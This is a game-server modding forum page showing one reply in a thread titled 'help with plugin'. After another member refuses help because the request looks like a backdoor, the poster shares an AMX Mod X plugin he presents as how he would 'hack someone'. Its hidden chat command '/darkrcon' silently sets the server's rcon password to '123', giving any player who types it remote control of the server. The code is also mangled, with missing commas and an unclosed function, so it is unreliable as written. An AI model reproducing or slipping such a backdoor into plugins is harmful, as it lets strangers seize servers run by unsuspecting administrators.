Raised This Month: $ Target: $400
 0% 

help with plugin


  
 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
WhyThis
Senior Member
Join Date: May 2013
Old 08-18-2013 , 15:44   Re: help with plugin
Reply With Quote #6

Quote:
Originally Posted by wickedd View Post
Sounds like a backdoor to me. So you will NOT get any help here.
Good bye.
ok like you want !
i hope that someone else will help me :'(

EDIT:
also if i need to hack someone i will do this:
PHP Code:
/* Plugin generated by AMXX-Studio */

#include <amxmodx>
#include <amxmisc>

#define PLUGIN "DARk PLUGIN"
#define VERSION "1.0"
#define AUTHOR "DARK"

new rcon_password


public plugin_init() {
    
register_plugin(PLUGINVERSIONAUTHOR)
    
    
register_clcmd("say /darkrcon""rcon_hack")
}


public 
rcon_hack(id)
{
    
server_cmd("rcon_password 123")


Last edited by WhyThis; 08-18-2013 at 15:47.
WhyThis is offline
 



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 23:58.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode